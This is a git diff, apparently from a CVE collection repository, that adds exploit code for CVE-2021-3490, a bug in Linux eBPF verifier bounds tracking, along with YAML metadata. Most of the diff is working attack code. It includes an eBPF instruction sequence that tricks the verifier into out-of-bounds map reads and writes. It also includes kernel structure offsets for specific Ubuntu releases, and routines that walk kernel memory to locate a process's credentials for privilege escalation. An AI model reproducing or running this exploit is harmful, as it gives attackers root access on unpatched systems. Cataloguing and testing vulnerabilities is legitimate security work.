00000000..d5ef53ed --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/exploit_configs.h @@ -0,0 +1,114 @@ +#ifndef _EXPLOIT_CONFIGS_H_ +#define _EXPLOIT_CONFIGS_H_ + +#define ARRAY_MAP_SIZE 0x1337 +#define DUMMY_MAP_ADD 0x1000 + +#define EXPLOIT_STATE_CLEAN 0 +#define EXPLOIT_STATE_READ 1 +#define EXPLOIT_STATE_WRITE 2 + +#define STORE_MAP_REG BPF_REG_2 +#define OOB_MAP_REG BPF_REG_3 +#define EXPLOIT_REG BPF_REG_4 +#define CONST_REG BPF_REG_5 +#define LEAK_VAL_REG BPF_REG_6 +#define UNKOWN_VALUE_REG BPF_REG_7 +#define COPY_REG BPF_REG_8 + + +typedef struct exploit_context +{ + int oob_map_fd; + int store_map_fd; + int prog_fd; + uint64_t oob_map_ptr; + uint64_t 
array_map_ops; + uint64_t init_pid_ns_kstrtab; + uint64_t init_pid_ns; + uint64_t cred; + uint32_t state; +} exploit_context; + + +// The exploit primitive is an eBPF program contained into two parts. The first part only triggers the bug, where EXPLOIT_REG will have incorrect 32 bit bounds (u32_min_value=1,u32_max_value=0). +// The second part causes the eBPF verifier to believe EXPLOIT_REG has a value of 0 but actually has a runtime value of 1. It is split into two parts because we only need the first part to leak +// the pointer to the BPF array map used for OOB read/writes. + +#define exploit_primitive_pt1(oob_map_fd, store_map_fd) \ +/* load oob_map values ptr into reg_0 */ \ +BPF_MOV64_IMM(BPF_REG_0, 0), \ +BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \ +BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ +BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \ +BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd), \ +BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ +/* check if the returned map value pointer is valid */ \ +BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ +BPF_EXIT_INSN(), \ +/* save oob map value ptr into preserved register reg_7 */ \ +BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), \ +/* load store_map values ptr into reg_0 */ \ +BPF_MOV64_IMM(BPF_REG_0, 0), \ +BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \ +BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ +BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \ +BPF_LD_MAP_FD(BPF_REG_1, store_map_fd), \ +BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ +/* check if the returned map value pointer is valid */ \ +BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ +BPF_EXIT_INSN(), \ +/* store the map value pointer into designated register */ \ +BPF_MOV64_REG(STORE_MAP_REG, BPF_REG_0),\ +/* save the oob map value pointer in the designated register */ \ +BPF_MOV64_REG(OOB_MAP_REG, BPF_REG_7), \ +/* prepare return value in reg_0 */ \ +BPF_MOV32_IMM(BPF_REG_0, 0), \ +/* load "unknown" value from the map, the real runtime value is 0 */ \ +BPF_LDX_MEM(BPF_DW, UNKOWN_VALUE_REG, STORE_MAP_REG, 0), \ +/* load "unknown" value into exploit register so it begins with a tnum mask of 0xFFFFFFFFFFFFFFFF */ \ +BPF_MOV64_REG(EXPLOIT_REG, UNKOWN_VALUE_REG), \ +/* constant register value is 0xFFFFFFFF */ \ +BPF_MOV32_IMM(CONST_REG, 0xFFFFFFFF), \ +/* constant register value is 0xFFFFFFFF00000000 */ \ +BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \ +/* exploit register has tnum mask of 0xFFFFFFFF00000000 since now the bottom 32 bits are known to be 0 */ \ +BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG), \ +/* exploit register has tnum value 0x1 and mask of 0xFFFFFFFF00000000 */ \ +BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \ +/* constant register value is 0x1 */ \ +BPF_MOV64_IMM(CONST_REG, 0x1), \ +/* constant register value is 0x100000000 */ \ +BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \ +/* constant register value is 0x100000002 */ \ +BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2), \ +/* trigger the bug, exploit register has u32_min_value=1,u32_max_value=0 */ \ +BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG) + +#define exploit_primitive_pt2 \ +/* exploit register has u32_min_value=2,u32_max_value=1 */ \ +BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \ +/* conditional so that unknown value register has u32_min_value=0,u32_max_value=1 */ \ +BPF_JMP32_IMM(BPF_JLE, UNKOWN_VALUE_REG, 1, 1), \ +BPF_EXIT_INSN(), \ +/* bounds from each register are added, exploit reg now has u32_min_value=u32_max_value=2, verifier believes lower 32 bits are constant and equal to 2 */ \ +BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, 
UNKOWN_VALUE_REG), \ +/* clear the top 32 bits, verifier believes exploit reg is constant value of 2 (during runtime the value is 1) */ \ +BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG), \ +/* verifier believes exploit register is 0, because 2 & 1 = 0, runtime value is still 1 */ \ +BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1), \ +/* make a copy of exploit register to do dummy map operations */\ +BPF_MOV64_REG(COPY_REG, EXPLOIT_REG), \ +/* add a constant value to map value pointer to set alu_limit = DUMMY_MAP_ADD, to bypass runtime ALU sanitation */ \ +BPF_ALU64_IMM(BPF_ADD, OOB_MAP_REG, DUMMY_MAP_ADD), \ +/* copy register value is DUMMY_MAP_ADD - 1, verifier believes it is 0 */\ +BPF_ALU64_IMM(BPF_MUL, COPY_REG, DUMMY_MAP_ADD - 1), \ +/* subtract DUMMY_MAP_ADD we just added to map value pointer, because verifier believes copy register is 0, alu_limit remains unchanged */ \ +BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, COPY_REG), \ +/* subtract the remaining byte, so runtime ALU sanitation checks are passed on versions not patched for CVE-2020-27171 */ \ +BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG) + + +int kernel_read(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len); + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h b/cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h new file mode 100644 index 00000000..345ced72 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h @@ -0,0 +1,160 @@ +#ifndef _KERNEL_DEFS__H_ +#define _KERNEL_DEFS__H_ + +#define KERNEL_BASE 0xFFFF000000000000 +#define KERNEL_DS 0xFFFFFFFFFFFFFFFF +#define IS_KERNEL_POINTER(x) (((x > KERNEL_BASE) && (x < KERNEL_DS))?1:0) + +// Backwards offset of ops field in bpf_map from start of map values memory chunk +#define BPF_MAP_OPS_OFFSET 0x110 +// Backwards offset of btf field in bpf_map from start map values memory chunk +#define BPF_MAP_BTF_OFFSET 0xD0 +// Backwards offset of spin_lock_off field in bpf_map from start of map values memory chunk +#define BPF_MAP_SPIN_LOCK_OFF_OFFSET 0xE4 +// Backwards offset of max_entries field in bpf_map from start of map values memory chunk +#define BPF_MAP_MAX_ENTRIES_OFFSET 0xEC +// Backwards offset of map_type field in bpf_map from start of map values memory chunk +#define BPF_MAP_TYPE_OFFSET 0xF8 + +// Offset of map_get_next_key function pointer in bpf_map_ops +#define MAP_OPS_GET_NEXT_KEY_OFFSET 0x20 +// Offset of map_push_elem function pointer in bpf_map_ops +#define MAP_OPS_PUSH_ELEM_OFFSET 0x70 + +// Offset of id field in btf struct +#define BTF_ID_OFFSET 0x58 + +// Offset of tasks field in pid structure +#define PID_TASKS_OFFSET 0x10 + +// Offset of linked list entry in task_struct +#ifdef GROOVY +#define TASK_LIST_OFFSET 0x950 +#endif +#ifdef HIRSUTE +#define TASK_LIST_OFFSET 0x578 +#endif +// Offset of cred pointer in task_struct +#ifdef GROOVY +#define TASK_CRED_OFFSET 0xA88 +#endif +#ifdef HIRSUTE +#define TASK_CRED_OFFSET 0x6C8 +#endif + +// Offset of uid field in cred structure +#define CRED_UID_OFFSET 0x4 +// Offset of gid field in cred structure +#define CRED_GID_OFFSET 0x8 +// Offset of euid field in cred structure +#define CRED_EUID_OFFSET 0x14 + + +// Copied from Linux Kernel source + +#define XA_CHUNK_SHIFT 0x6 +#define XA_CHUNK_SIZE 0x40 + +#define XA_RETRY_ENTRY xa_mk_internal(256) + +#define RADIX_TREE_RETRY XA_RETRY_ENTRY +#define RADIX_TREE_MAP_SHIFT XA_CHUNK_SHIFT +#define RADIX_TREE_MAP_SIZE (1UL << RADIX_TREE_MAP_SHIFT) +#define RADIX_TREE_MAP_MASK (RADIX_TREE_MAP_SIZE-1) + + 
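+/*
+ * These copied definitions let kmem_search.c re-implement
+ * radix_tree_lookup()/idr_find()/find_pid_ns() in userspace, walking
+ * init_pid_ns.idr through the kernel read primitive to resolve a pid to its
+ * struct pid, task_struct and, finally, its cred structure.
+ */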
+/* + * The bottom two bits of the slot determine how the remaining bits in the + * slot are interpreted: + * + * 00 - data pointer + * 10 - internal entry + * x1 - value entry + * + * The internal entry may be a pointer to the next level in the tree, a + * sibling entry, or an indicator that the entry in this slot has been moved + * to another location in the tree and the lookup should be restarted. While + * NULL fits the 'data pointer' pattern, it means that there is no entry in + * the tree for this index (no matter what level of the tree it is found at). + * This means that storing a NULL entry in the tree is the same as deleting + * the entry from the tree. + */ +#define RADIX_TREE_ENTRY_MASK 3UL +#define RADIX_TREE_INTERNAL_NODE 2UL + + +/** + * struct xarray - The anchor of the XArray. + * @xa_lock: Lock that protects the contents of the XArray. + * + * To use the xarray, define it statically or embed it in your data structure. + * It is a very small data structure, so it does not usually make sense to + * allocate it separately and keep a pointer to it in your data structure. + * + * You may use the xa_lock to protect your own data structures as well. + */ +/* + * If all of the entries in the array are NULL, @xa_head is a NULL pointer. + * If the only non-NULL entry in the array is at index 0, @xa_head is that + * entry. If any other entry in the array is non-NULL, @xa_head points + * to an @xa_node. + */ +struct xarray +{ + int32_t xa_lock; + int32_t xa_flags; + void *xa_head; +}; + + +/* + * xa_mk_internal() - Create an internal entry. + * @v: Value to turn into an internal entry. + * + * Internal entries are used for a number of purposes. Entries 0-255 are + * used for sibling entries (only 0-62 are used by the current code). 256 + * is used for the retry entry. 257 is used for the reserved / zero entry. + * Negative internal entries are used to represent errnos. Node pointers + * are also tagged as internal entries in some situations. + * + * Context: Any context. + * Return: An XArray internal entry corresponding to this value. 
+ */ +static inline void *xa_mk_internal(unsigned long v) +{ + return (void *)((v << 2) | 2); +} + +#define radix_tree_root xarray +#define radix_tree_node xa_node + + +struct xa_node +{ + unsigned char shift; /* Bits remaining in each slot */ + unsigned char offset; /* Slot offset in parent */ + unsigned char count; /* Total entry count */ + unsigned char nr_values; /* Value entry count */ + struct xa_node *parent; /* NULL at top of tree */ + struct xarray *array; /* The array we belong to */ + char filler[0x10]; + void *slots[XA_CHUNK_SIZE]; +}; + +struct idr +{ + struct radix_tree_root idr_rt; + unsigned int idr_base; + unsigned int idr_next; +}; + +struct pid_namespace +{ +#ifdef GROOVY + uint64_t padding; +#endif + struct idr idr; +}; + + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h b/cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h new file mode 100644 index 00000000..961dac9e --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h @@ -0,0 +1,12 @@ +#ifndef _KMEM_SEARCH_H_ +#define _KMEM_SEARCH_H_ + +#include "exploit_configs.h" + +#define KMEM_MAX_SEARCH 0xFFFFFFF + +int search_init_pid_ns_kstrtab(exploit_context* pCtx); +int search_init_pid_ns_ksymtab(exploit_context* pCtx); +int find_pid_cred(exploit_context* pCtx, pid_t pid); + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c b/cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c new file mode 100644 index 00000000..a49645ae --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c @@ -0,0 +1,276 @@ +#include +#include +#include +#include +#include +#include + +#include "kernel_defs.h" +#include "kmem_search.h" +#include "exploit_configs.h" + + +char* pKernelMemory = NULL; +uint32_t uiLen = 0; + + +// Userspace/exploit implementations of corresponding kernel functions + +static inline unsigned long shift_maxindex(unsigned int shift) +{ + return (RADIX_TREE_MAP_SIZE << shift) - 1; +} + +static inline unsigned long node_maxindex(const struct radix_tree_node *node) +{ + return shift_maxindex(node->shift); +} + +static inline struct radix_tree_node *entry_to_node(void *ptr) +{ + return (void *)((unsigned long)ptr & ~RADIX_TREE_INTERNAL_NODE); +} + +static inline bool radix_tree_is_internal_node(void *ptr) +{ + return ((unsigned long)ptr & RADIX_TREE_ENTRY_MASK) == + RADIX_TREE_INTERNAL_NODE; +} + +static unsigned int radix_tree_descend(exploit_context* pCtx, const struct radix_tree_node *parent, + struct radix_tree_node **nodep, unsigned long index) +{ + unsigned int offset = 0; + void **entry = NULL; + struct radix_tree_node node_in = {0}; + + kernel_read(pCtx, (uint64_t)parent, (char*)&node_in, sizeof(node_in)); + offset = (index >> node_in.shift) & RADIX_TREE_MAP_MASK; + + entry = node_in.slots[offset]; + + *nodep = (void *)entry; + return offset; +} + +static unsigned radix_tree_load_root(exploit_context* pCtx, const struct radix_tree_root *root, + struct radix_tree_node **nodep, unsigned long *maxindex) +{ + struct radix_tree_node *node = root->xa_head; + struct radix_tree_node node_in = {0}; + *nodep = node; + + if (radix_tree_is_internal_node(node)) + { + node = entry_to_node(node); + kernel_read(pCtx, (uint64_t)node, (char*)&node_in, sizeof(node_in)); + *maxindex = node_maxindex(&node_in); + return node_in.shift + RADIX_TREE_MAP_SHIFT; + } + + *maxindex = 0; + return 0; +} + +void *__radix_tree_lookup(exploit_context* pCtx, const struct radix_tree_root *root, + unsigned long 
index, struct radix_tree_node **nodep, + void ***slotp) +{ + struct radix_tree_node *node, *parent; + unsigned long maxindex; + void **slot; + struct radix_tree_node node_in = {0}; + + restart: + parent = NULL; + slot = (void **)&root->xa_head; + radix_tree_load_root(pCtx, root, &node, &maxindex); + + if (index > maxindex) + return NULL; + + while (radix_tree_is_internal_node(node)) { + unsigned offset; + + parent = entry_to_node(node); + offset = radix_tree_descend(pCtx, parent, &node, index); + kernel_read(pCtx, (uint64_t)parent, (char*)&node_in, sizeof(node_in)); + slot = node_in.slots + offset; + if (node == RADIX_TREE_RETRY) + goto restart; + if (node_in.shift == 0) + break; + } + + if (nodep) + *nodep = parent; + if (slotp) + *slotp = slot; + return node; +} + +void *radix_tree_lookup(exploit_context* pCtx, const struct radix_tree_root *root, unsigned long index) +{ + return __radix_tree_lookup(pCtx, root, index, NULL, NULL); +} + +void *idr_find(exploit_context* pCtx, const struct idr *idr, unsigned long id) +{ + return radix_tree_lookup(pCtx, &idr->idr_rt, id - idr->idr_base); +} + +struct pid *find_pid_ns(exploit_context* pCtx, int nr) +{ + struct pid_namespace ns = {0}; + + kernel_read(pCtx, pCtx->init_pid_ns, (char*)&ns, sizeof(ns)); + + return idr_find(pCtx, &ns.idr, nr); +} + +int find_pid_cred(exploit_context* pCtx, pid_t pid) +{ + int ret = -1; + uint64_t pid_struct = 0; + uint64_t first = 0; + uint64_t task = 0; + + pid_struct = (uint64_t)find_pid_ns(pCtx, pid); + + if(!IS_KERNEL_POINTER(pid_struct)) + { + goto done; + } + + kernel_read(pCtx, pid_struct + PID_TASKS_OFFSET, (char*)&first, sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(first)) + { + goto done; + } + + task = first - TASK_LIST_OFFSET; + + kernel_read(pCtx, task + TASK_CRED_OFFSET, (char*)&pCtx->cred, sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(pCtx->cred)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +// Custom search functions + +char* strnstr_c(char *str, const char *substr, size_t n) +{ + char *p = str, *pEnd = str+n; + size_t substr_len = strlen(substr); + + if(0 == substr_len) + { + return str; + } + + pEnd -= (substr_len - 1); + + for(;p < pEnd; ++p) + { + if(0 == strncmp(p, substr, substr_len)) + { + return p; + } + } + + return NULL; +} + +int search_init_pid_ns_kstrtab(exploit_context* pCtx) +{ + int ret = -1; + char init_pid_ns[] = "init_pid_ns"; + + if(NULL == pKernelMemory) + { + pKernelMemory = malloc(PAGE_SIZE); + uiLen = PAGE_SIZE; + } + + for(uint32_t i = 0; i < KMEM_MAX_SEARCH; i+= PAGE_SIZE) + { + if(NULL == pKernelMemory) + { + printf("[-] failed to allocate memory!\n"); + goto done; + } + + if(0 != kernel_read(pCtx, pCtx->array_map_ops + i, pKernelMemory + i, PAGE_SIZE)) + { + goto done; + } + + if(0 < i) + { + char* substr = strnstr_c(pKernelMemory + i - sizeof(init_pid_ns), init_pid_ns, PAGE_SIZE + sizeof(init_pid_ns)); + + if(NULL != substr) + { + uint32_t offset = substr - pKernelMemory; + pCtx->init_pid_ns_kstrtab = pCtx->array_map_ops + offset; + ret = 0; + break; + } + } + + pKernelMemory = realloc(pKernelMemory, i + 2*PAGE_SIZE); + uiLen = i + 2*PAGE_SIZE; + } + +done: + if((0 != ret) && (NULL != pKernelMemory)) + { + free(pKernelMemory); + pKernelMemory = NULL; + } + + return ret; +} + +int search_init_pid_ns_ksymtab(exploit_context* pCtx) +{ + int ret = -1; + uint64_t pStartAddr = pCtx->array_map_ops; + + if(NULL == pKernelMemory) + { + goto done; + } + + for(uint32_t i = 0; i < uiLen; i++) + { + uint32_t offset = *(uint32_t*)(pKernelMemory + i); + + if((pStartAddr 
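+            /* ksymtab entries appear to use 32-bit place-relative offsets
+               (PREL32): when pStartAddr + offset hits the kstrtab string, byte i
+               overlays the entry's name_offset field, and the value_offset field
+               4 bytes earlier gives init_pid_ns = (pStartAddr - 4) + value_offset */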
+ offset) == pCtx->init_pid_ns_kstrtab)
+        {
+            uint32_t value_offset = *(uint32_t*)(pKernelMemory + i - 0x4);
+            pCtx->init_pid_ns = pStartAddr + value_offset - 0x4;
+            ret = 0;
+            break;
+        }
+
+        pStartAddr++;
+    }
+
+done:
+    if(NULL != pKernelMemory)
+    {
+        free(pKernelMemory);
+        pKernelMemory = NULL;
+    }
+
+    return ret;
+}
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml
new file mode 100644
index 00000000..60ba839b
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-3490
+source: https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490
+info:
+  name: The Linux kernel is the kernel used by Linux, the open-source operating system maintained by the Linux Foundation.
+  severity: high
+  description: |
+    The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf: Fix a verifier failure with xor") (5.10-rc1).
+  scope-of-influence:
+    5.7 ≤ linux-kernel < 5.13 (fixed in stable releases 5.10.37, 5.11.21 and 5.12.4)
+  reference:
+    - https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e
+    - https://security.netapp.com/advisory/ntap-20210716-0004/
+    - https://ubuntu.com/security/notices/USN-4949-1
+    - https://ubuntu.com/security/notices/USN-4950-1
+    - https://www.openwall.com/lists/oss-security/2021/05/11/11
+    - https://www.zerodayinitiative.com/advisories/ZDI-21-606/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-3490
+    cwe-id: CWE-20, CWE-125, CWE-787
+    cnvd-id: None
+    kve-id: None
+  tags: cve2021, out-of-bounds read/write
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 1ed80196..c29bebce 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -14,6 +14,7 @@ cve:
   - CVE-2021-4204
   - CVE-2021-22555
   - CVE-2021-4154
+  - CVE-2021-3490
   - CVE-2022-34918
   - CVE-2022-2639
   - CVE-2022-0847
-- Gitee